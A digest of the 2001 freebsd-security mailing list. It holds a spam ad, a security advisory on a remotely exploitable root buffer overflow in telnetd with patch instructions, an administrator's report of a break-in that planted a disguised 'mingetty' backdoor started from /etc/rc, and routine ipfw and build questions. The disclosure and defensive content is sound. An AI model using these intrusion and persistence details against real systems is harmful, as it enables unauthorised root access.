freebsd-security@freebsd.org Received: from 21.232.01.7 (OL154-95.fibertel.com.ar [24.232.95.154]) by hub.freebsd.org (Postfix) with SMTP id 46F4337B401 for ; Mon, 23 Jul 2001 16:20:26 -0700 (PDT) (envelope-from ricardo_herrera_noble@hotmail.com) X-Server: hotmail From: Jorge Velazquez To: Reply-To: a_golza_@hotmail.com X-Mailer: MultiMailer (3.1.0) Subject: Estimado Usuario Mime-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable Message-Id: <20010723232026.46F4337B401@hub.freebsd.org> Date: Mon, 23 Jul 2001 16:20:26 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Filtrar el= agua de bebida incrementa nuestra calidad de= vida.

La mayoria de los malos sabores,= olores y turbidez presente en el agua potable son causados por= la presencia de cloro y materiales orgánicos.

El cloro utilizado muy eficazmente= para potabilizar el agua de bebida, es causal del mal sabor y en= mayor cantidad es perjudicial para la salud.
El material orgánico presente en tanques y cañerias= de agua corrientes (residuos de hojas, insectos, etc.) le= agregan al agua turbidez y mal sabor.

También tenemos la combinación del material= orgánico con el cloro, formando los peligrosos= Trihalometanos (THM), compuesto altamente tóxico.

La forma mas simple y efectiva para remover tanto el cloro como= el material orgánico y los THM es mediante el pasaje del= agua a través de un filtro purificador (*)= con lecho de carbón activado.

(*) CUNO= posee mas de 90 años de experiencia en= purificación y filtración de agua, y provee= filtros de agua a empresas como Mc Donald's en Argentina y en el= mundo.


Si quiere recibir más información sobre este tema= comuníquese al
011- 4555-6050=

o desde el interior sin cargo al=
0800-222-6392

Gracias.


= NeWater= Argentina
Purificación de agua para= empresas y hogares
 Charlone 516 , Buenos Aires, Argentina
= tel: 011-4555-6050(rot.)
 email: newater@movi.com.ar




Si usted= no desea recibir mas información nuestra envíenos= un email con asunto "Borrar". Gracias.

Produced= by La Jolla Advertiding Co., CA, USA




 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 16:43:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from exodus.slashx.net (slashx.lightningone.net [12.34.104.100]) by hub.freebsd.org (Postfix) with ESMTP id 2B7A137B403 for ; Mon, 23 Jul 2001 16:43:14 -0700 (PDT) (envelope-from netbios@exodus.slashx.net) Received: from localhost (netbios@localhost) by exodus.slashx.net (8.11.4/8.11.4) with ESMTP id f6NKOWW07052 for ; Mon, 23 Jul 2001 20:24:32 GMT (envelope-from netbios@exodus.slashx.net) Date: Mon, 23 Jul 2001 20:24:31 +0000 (GMT) From: "www.slashx.net" To: Subject: SSH 3 exploit? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i heard there is a new SSHd exploit, is this a rumor or is this true? thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 17: 2:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id 6D47837B401 for ; Mon, 23 Jul 2001 17:02:35 -0700 (PDT) (envelope-from rik@rikrose.net) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id BAA11690; Tue, 24 Jul 2001 01:02:34 +0100 Date: Tue, 24 Jul 2001 01:02:34 +0100 (BST) From: rik@rikrose.net X-Sender: rik@pkl.net To: "www.slashx.net" Cc: security@FreeBSD.ORG Subject: Re: SSH 3 exploit? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 23 Jul 2001, www.slashx.net wrote: > i heard there is a new SSHd exploit, is this a rumor or is this > true? thanks. Over a week old on bugtraw, but for COMMERCIAL ssh 3.0.0: http://securityfocus.com/templates/archive.pike?list=1&start=2001-07-15&mid=198404&threads=0&fromthread=0&end=2001-0721& To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 17: 5:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-215.dsl.lsan03.pacbell.net [63.207.60.215]) by hub.freebsd.org (Postfix) with ESMTP id 3A89237B401 for ; Mon, 23 Jul 2001 17:05:14 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3E7B866B04; Mon, 23 Jul 2001 17:05:13 -0700 (PDT) Date: Mon, 23 Jul 2001 17:05:12 -0700 From: Kris Kennaway To: "www.slashx.net" Cc: security@FreeBSD.ORG Subject: Re: SSH 3 exploit? Message-ID: <20010723170512.A49780@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="VS++wcV0S1rZb1Fb" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from netbios@exodus.slashx.net on Mon, Jul 23, 2001 at 08:24:31PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VS++wcV0S1rZb1Fb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Doesn't affect the version included with FreeBSD. Kris --VS++wcV0S1rZb1Fb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XLu3Wry0BWjoQKURAu35AJ4sOvs4k8CPgt7srOCB9i3XJq5FrgCg3x18 +q24w2p5tK5stXXNnBCQU54= =9g31 -----END PGP SIGNATURE----- --VS++wcV0S1rZb1Fb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 17:16:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4043137B401; Mon, 23 Jul 2001 17:16:01 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.4/8.11.4) id f6O0G1408361; Mon, 23 Jul 2001 17:16:01 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 23 Jul 2001 17:16:01 -0700 (PDT) Message-Id: <200107240016.f6O0G1408361@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:49 Security Advisory FreeBSD, Inc. Topic: telnetd contains remote buffer overflow Category: core Module: telnetd Announced: 2001-07-23 Credits: Sebastian Affects: All releases of FreeBSD 3.x, 4.x prior to 4.4, FreeBSD 4.3-STABLE prior to the correction date Corrected: 2001-07-23 FreeBSD only: NO I. Background telnetd is the server for the telnet remote virtual terminal protocol. II. Problem Description An overflowable buffer was found in the version of telnetd included with FreeBSD. Due to incorrect bounds checking of data buffered for output to the remote client, an attacker can cause the telnetd process to overflow the buffer and crash, or execute arbitrary code as the user running telnetd, usually root. A valid user account and password is not required to exploit this vulnerability, only the ability to connect to a telnetd server. The telnetd service is enabled by default on all FreeBSD installations if the 'high' security setting is not selected at install-time. This vulnerability is known to be exploitable, and is being actively exploited in the wild. All released versions of FreeBSD prior to the correction date including 3.5.1-RELEASE and 4.3-RELEASE are vulnerable to this problem. It was corrected prior to the forthcoming release of 4.4-RELEASE. III. Impact Remote users can cause arbitrary code to be executed as the user running telnetd, usually root. IV. Workaround 1) Disable the telnet service, which is usually run out of inetd: comment out the following lines in /etc/inetd.conf, if present. telnet stream tcp nowait root /usr/libexec/telnetd telnetd telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd and execute the following command as root: # kill -HUP `cat /var/run/inetd.pid` 2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or a network-level packet filter such as ipfw(8) or ipf(8) on the perimeter firewall or the local machine, to limit access to the telnet service to trusted machines. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.3-STABLE or the RELENG_4_3 security branch after the respective correction dates. 2) FreeBSD 3.5.1, 4.x systems prior to the correction date: There are two versions of the patch available, for systems with and without the /usr/src/crypto/telnet sources. To determine whether your system has the crypto-telnet sources installed, perform the following command: # ls /usr/src/crypto/telnet/telnetd A response of ls: /usr/src/crypto/telnet/telnetd: No such file or directory indicates you do not have the sources present and should download the non-crypto-telnet patch. These patches have been verified to apply to FreeBSD 4.2-RELEASE, 4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of 3.5.1-RELEASE must have applied the patches from FreeBSD Security Advisory 00:69 prior to applying this patch). These patches may or may not apply to older, unsupported releases of FreeBSD. 2a) For systems with the crypto-telnet sources installed Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/secure/libexec/telnetd # make depend && make all install 2b) For systems without the crypto-telnet sources installed Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc # cd /usr/src/ # patch -p < /path/to/patch # cd /usr/src/libexec/telnetd # make depend && make all install 3) FreeBSD 4.3-RELEASE systems: An experimental upgrade package is available for users who wish to provide testing and feedback on the binary upgrade process. This package may be installed on FreeBSD 4.3-RELEASE systems only, and is intended for use on systems for which source patching is not practical or convenient. If you use the upgrade package, feedback (positive or negative) to security-officer@FreeBSD.org is requested so we can improve the process for future advisories. During the installation procedure, backup copies are made of the files which are replaced by the package. These backup copies will be reinstalled if the package is removed, reverting the system to a pre-patched state. Two versions of the upgrade package are available, depending on whether or not the system has the crypto distribution installed. To verify whether your system has the crypto distribution installed, perform the following command: # ls /usr/bin/openssl Possible responses: /usr/bin/openssl # This response indicates you have crypto present ls: /usr/bin/openssl: No such file or directory # This reponse indicates you do not have # crypto present 3a) If crypto is not present # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz.asc Verify the detached PGP signature using your PGP utility. # pkg_add security-patch-telnetd-01.49.tgz 3b) If crypto is present # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz.asc Verify the detached PGP signature using your PGP utility. # pkg_add security-patch-telnetd-crypto-01.49.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBO1ywjFUuHi5z0oilAQFYSgP/Q/wEIdR8gcBveH6oDMpXJXZ72zqnEnSo 0w7jyX9D+Mi0wwvRtsZlZXDvw1R4H6ljoGIKhzlRk/ZMJej2sxTQSqew6M2dD+f6 z6wJNMY05g4RJg/KqkYozucijl0N38/pRJs1tlz2QPDxJfPGXjzrew4lrBs/QyNv elrJ01VLliA= =ZMBy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 17:51:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-215.dsl.lsan03.pacbell.net [63.207.60.215]) by hub.freebsd.org (Postfix) with ESMTP id AB42437B405; Mon, 23 Jul 2001 17:51:24 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8746566B04; Mon, 23 Jul 2001 17:51:23 -0700 (PDT) Date: Mon, 23 Jul 2001 17:51:23 -0700 From: Kris Kennaway To: Montgomery Newcom Cc: security-officer@FreeBSD.org, security@FreeBSD.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd (fwd) Message-ID: <20010723175122.A51801@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="J/dobhs11T7y2rNN" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mn@gblx.net on Mon, Jul 23, 2001 at 05:38:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --J/dobhs11T7y2rNN Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 23, 2001 at 05:38:48PM -0700, Montgomery Newcom wrote: >=20 > I installed security-patch-telnetd-crypto-01.49.tgz .. >=20 > (twitch)$ telnet www > Trying 64.210.23.2... > Connected to helterskelter.org. > Escape character is '^]'. > /usr/libexec/ld-elf.so.1: Shared object "libpam.so.2" not found > Connection closed by foreign host. >=20 > (www)$ ls /usr/bin/openssl > /usr/bin/openssl Grr, I'm not sure how that happened; that package was supposed to be built in a chroot. I've corrected it and uploaded the new version. Kris --J/dobhs11T7y2rNN Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XMaKWry0BWjoQKURAhMWAJ0cuKLNA3t+b50DiW/9ZshyW/7feQCfb7VR bfL0HXjYkkN3iwEerc1tHoo= =40zl -----END PGP SIGNATURE----- --J/dobhs11T7y2rNN-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 18:27:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.188.244]) by hub.freebsd.org (Postfix) with ESMTP id 0F6F737B401 for ; Mon, 23 Jul 2001 18:27:50 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from backup.af.speednet.com.au (backup.af.speednet.com.au [172.22.2.4]) by backup.af.speednet.com.au (8.11.4/8.11.4) with ESMTP id f6O1RlA56095 for ; Tue, 24 Jul 2001 11:27:47 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Tue, 24 Jul 2001 11:27:46 +1000 (EST) From: Andy Farkas X-X-Sender: To: Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 23 Jul 2001, FreeBSD Security Advisories wrote: > Topic: telnetd contains remote buffer overflow Well, hate to say this, but several of my systems were cracked into. No need to say any more, it was all my fault... Anyways, there was a process running called 'mingetty' with a zombie /bin/sh right after it... the file was added to /usr/bin and given a time/datestamp similar to the other files to make it look like it was installed with the system ... a line was also added to /etc/rc to start it up on reboot... Heaven knows what else they did, but I just thought I'd send a heads-up, as this was a fairly obvious hack to spot... Bad Andy. No cookie. -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 23 22: 5: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yellow-pages.spb.ru (ns.yellow-pages.spb.ru [195.144.224.134]) by hub.freebsd.org (Postfix) with SMTP id 287D737B406 for ; Mon, 23 Jul 2001 22:04:54 -0700 (PDT) (envelope-from raindog@yell.ru) Received: (qmail 321 invoked from network); 24 Jul 2001 05:09:53 -0000 Received: from unknown (HELO wildmhz) (192.168.1.201) by ns.yellow-pages.spb.ru with SMTP; 24 Jul 2001 05:09:53 -0000 Date: Tue, 24 Jul 2001 09:04:50 +0400 From: Gennady Persinin X-Mailer: The Bat! (v1.52f) Personal Reply-To: Gennady Persinin Organization: YP X-Priority: 3 (Normal) Message-ID: <1772871298.20010724090450@yell.ru> To: freebsd-security@FreeBSD.ORG Subject: auth 237d96bf unsubscribe freebsd-security raindog@yell.ru MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org auth 237d96bf unsubscribe freebsd-security raindog@yell.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 3:12:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from infinitive.futureperfectcorporation.com (curie.sunesi.com [196.25.112.244]) by hub.freebsd.org (Postfix) with SMTP id 1CA5337B405 for ; Tue, 24 Jul 2001 03:12:33 -0700 (PDT) (envelope-from nbm@gerund.futureperfectcorporation.com) Received: (qmail 3422 invoked by uid 0); 24 Jul 2001 10:14:07 -0000 Received: from choke.sunesi.net (HELO gerund.futureperfectcorporation.com) (196.25.112.242) by infinitive.futureperfectcorporation.com with SMTP; 24 Jul 2001 10:14:07 -0000 Received: (qmail 24011 invoked by uid 1001); 24 Jul 2001 10:12:37 -0000 Date: Tue, 24 Jul 2001 12:12:37 +0200 From: Neil Blakey-Milner To: "Antoine Beaupre (LMC)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rc.firewall change comments request Message-ID: <20010724121237.A12846@mithrandr.moria.org> References: <3B5C8F47.5050300@lmc.ericsson.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B5C8F47.5050300@lmc.ericsson.se>; from Antoine.Beaupre@ericsson.ca on Mon, Jul 23, 2001 at 04:55:35PM -0400 Organization: iTouch Labs X-Operating-System: FreeBSD 4.3-RELEASE i386 X-URL: http://mithrandr.moria.org/nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon 2001-07-23 (16:55), Antoine Beaupre (LMC) wrote: > I find that using a custom ruleset is a pain in the current rc.firewall > setup. > > For example, since alternate setups are sourced using "ipfw" instead of > the shell, you do not have access to valuable variables and > conditionals, being limited to ipfw' syntax. You can use the '-p' option to ipfw to specify a preprocessor. The man page says a bit more. Neil -- Neil Blakey-Milner nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 6:34:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr2.ericy.com (imr2.ericy.com [12.34.240.68]) by hub.freebsd.org (Postfix) with ESMTP id 2543F37B403; Tue, 24 Jul 2001 06:34:19 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr5.exu.ericsson.se (mr5att.ericy.com [138.85.92.13]) by imr2.ericy.com (8.11.3/8.11.3) with ESMTP id f6ODYI520875; Tue, 24 Jul 2001 08:34:18 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr5.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f6ODYHr29866; Tue, 24 Jul 2001 08:34:18 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f6ODYGA13607; Tue, 24 Jul 2001 09:34:16 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Tue, 24 Jul 2001 09:34:15 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id PRG01APM; Tue, 24 Jul 2001 09:34:09 -0400 From: "Antoine Beaupre (LMC)" To: Gregory Neil Shapiro Cc: freebsd-security@FreeBSD.ORG Message-ID: <3B5D7950.8070906@lmc.ericsson.se> Date: Tue, 24 Jul 2001 09:34:08 -0400 Organization: LMC, Ericsson Research Canada User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2+) Gecko/20010717 X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: rc.firewall change comments request References: <3B5C8F47.5050300@lmc.ericsson.se> <15196.44529.197423.239149@horsey.gshapiro.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gregory Neil Shapiro wrote: > Antoine.Beaupre> For example, since alternate setups are sourced using > Antoine.Beaupre> "ipfw" instead of the shell, you do not have access to > Antoine.Beaupre> valuable variables and conditionals, being limited to > Antoine.Beaupre> ipfw' syntax. > > Antoine.Beaupre> I use conditionals and variables to make the config file > Antoine.Beaupre> more readable. > > Antoine.Beaupre> I think that having a flat ipfw source file is unpractical > Antoine.Beaupre> and hard to maintain. > > Why not just set firewall_script in your /etc/rc.conf? > > firewall_script="/etc/rc.firewall" # Which script to run to set up the firewall Ah-ah! I knew there was something I was missing. Sorry for the lame complaining. :) A. -- Antoine Beaupré Jambala TCM team Ericsson Canada inc. mailto:antoine.beaupre@ericsson.ca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 6:47:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mirage.nlink.com.br (mirage.nlink.com.br [200.249.195.3]) by hub.freebsd.org (Postfix) with SMTP id 2CE7937B401 for ; Tue, 24 Jul 2001 06:47:41 -0700 (PDT) (envelope-from Mlobo@ear.com.br) Received: (qmail 98068 invoked from network); 24 Jul 2001 13:54:26 -0000 Received: from ear.nlink.com.br (HELO ear.com.br) (200.249.196.67) by mirage.nlink.com.br with SMTP; 24 Jul 2001 13:54:26 -0000 Received: from EARMDPA01/SpoolDir by ear.com.br (Mercury 1.48); 24 Jul 01 10:50:00 GMT-3 Received: from SpoolDir by EARMDPA01 (Mercury 1.48); 24 Jul 01 10:49:05 GMT-3 From: "Mario de Oliveira Lobo Neto" Organization: American School of Recife - Brazil To: freebsd-security@FreeBSD.ORG Date: Tue, 24 Jul 2001 10:48:41 -0300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: ipfw question Reply-To: mlobo@ear.com.br Message-ID: <3B5D528A.2304.1D1FDA@localhost> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please forgive my lame question but here it goes. We use to have FreeBSD 2.2.8. Every time a rule in ipfw was met, the attempt would get listed on the monitor. I know everything is in the logs but it was convenient to have the attempts listed on the monitor when comming in the morning after. Recently, I've upgraded to 4.3 -RC2. Everything works fine but I don't get the attempts listed on the monitor anymore. How can I get them listed again? Thanks, Mario Lobo - *** Mario Lobo - mlobo@ear.com.br *** American School of Recife To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 6:51:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.reis.zp.ua (relay.reis.zp.ua [212.35.166.3]) by hub.freebsd.org (Postfix) with ESMTP id DC10537B405 for ; Tue, 24 Jul 2001 06:51:45 -0700 (PDT) (envelope-from laa@reis.zp.ua) Received: (from laa@localhost) by relay.reis.zp.ua with œ id f6ODodD67228; Tue, 24 Jul 2001 16:50:39 +0300 (EEST) (envelope-from laa@reis.zp.ua)œ Date: Tue, 24 Jul 2001 16:50:38 +0300 From: Alexandr Listopad To: Mario de Oliveira Lobo Neto Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw question Message-ID: <20010724165038.Q89646@relay.reis.zp.ua> References: <3B5D528A.2304.1D1FDA@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <3B5D528A.2304.1D1FDA@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 24, 2001 at 10:48:41AM -0300, Mario de Oliveira Lobo Neto wrote: > Please forgive my lame question but here it goes. > > We use to have FreeBSD 2.2.8. Every time a rule in ipfw was met, > the attempt would get listed on the monitor. I know everything is in > the logs but it was convenient to have the attempts listed on the > monitor when comming in the morning after. > > Recently, I've upgraded to 4.3 -RC2. Everything works fine but I > don't get the attempts listed on the monitor anymore. How can I get > them listed again? see /etc/syslog.conf and syslog.conf(5) -- Alexandr Listopad, ReIS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:33:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp03.mrf.mail.rcn.net (smtp03.mrf.mail.rcn.net [207.172.4.62]) by hub.freebsd.org (Postfix) with ESMTP id 3FE3737B403 for ; Tue, 24 Jul 2001 07:33:56 -0700 (PDT) (envelope-from jolt-mail@nicholasofmyra.org) Received: from 207-172-109-89.s89.tnt1.war.va.dialup.rcn.com ([207.172.109.89] helo=compops1.nicholasofmyra.org) by smtp03.mrf.mail.rcn.net with esmtp (Exim 3.31 #3) id 15P3Fx-0000Z1-00 ; Tue, 24 Jul 2001 10:33:54 -0400 Message-Id: <5.1.0.14.0.20010724103449.00adaab0@joseph.nicholasofmyra.org> X-Sender: jolt@joseph.nicholasofmyra.org (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 24 Jul 2001 10:36:07 -0400 To: Kris Kennaway From: Joseph Subject: Re: Make world - crypt-blowfish.c error Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20010723141245.A96187@xor.obsecurity.org> References: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5> <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you. That was it. I had used the cvsupit port which did not list src-crypto. At 7/23/2001, Monday at 05:12 PM, Kris Kennaway wrote: >You didn't cvsup the src-crypto collection. > >Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 7:40:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 6A0E637B403 for ; Tue, 24 Jul 2001 07:40:34 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id SAA21340; Tue, 24 Jul 2001 18:34:30 +0400 (MSD) Date: Tue, 24 Jul 2001 18:34:30 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <894633742.20010724183430@internethelp.ru> To: "Mario de Oliveira Lobo Neto" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw question In-reply-To: <3B5D528A.2304.1D1FDA@localhost> References: <3B5D528A.2304.1D1FDA@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Mario, Tuesday, July 24, 2001, 5:48:41 PM, you wrote: MdOLN> Please forgive my lame question but here it goes. MdOLN> We use to have FreeBSD 2.2.8. Every 